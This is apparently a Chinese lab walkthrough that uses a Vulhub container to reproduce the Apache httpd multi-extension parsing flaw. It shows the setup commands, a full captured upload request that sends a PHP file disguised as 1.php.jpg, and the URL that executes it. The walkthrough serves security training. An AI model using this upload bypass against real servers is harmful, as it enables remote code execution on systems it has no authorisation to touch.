步骤一:进入Vulhub靶场并执行以下命令启动靶场...
cd /vulhub/httpd/apache_parsing_vulnerability docker-compose up -d docker ps -a
步骤二:访问靶机并上传1.php.jpg
文件,文件内容为phpinfo
函数...进行抓包..
POST / HTTP/1.1 Host: 101.42.118.221 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: multipart/form-data; boundary=---------------------------13126981399916040642324260341 Content-Length: 260 Origin: http://101.42.118.221 Connection: close Referer: http://101.42.118.221/ Upgrade-Insecure-Requests: 1 -----------------------------13126981399916040642324260341 Content-Disposition: form-data; name="file_upload"; filename="1.php.jpg" Content-Type: application/octet-stream <?php phpinfo();?> -----------------------------13126981399916040642324260341--
步骤三:上传成功后与网站进行路径拼接...如下:
http://101.42.118.221/uploadfiles/1.php.jpg